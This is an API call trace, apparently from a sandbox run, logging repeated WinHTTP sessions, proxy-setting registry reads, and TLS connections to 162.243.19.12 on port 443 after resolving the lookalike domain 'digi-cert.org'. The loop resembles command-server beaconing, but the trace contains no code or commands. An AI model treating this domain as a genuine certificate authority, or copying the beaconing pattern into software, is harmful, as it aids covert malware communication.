Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 213, size_out = 213	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 213, size_out = 213	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 61, size_out = 61	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1575, size_out = 1575	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 331, size_out = 331	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4, size_out = 4	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 134, size_out = 134	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 218, size_out = 218	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 213, size_out = 213	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 272, size_out = 272	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1248, size_out = 1248	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
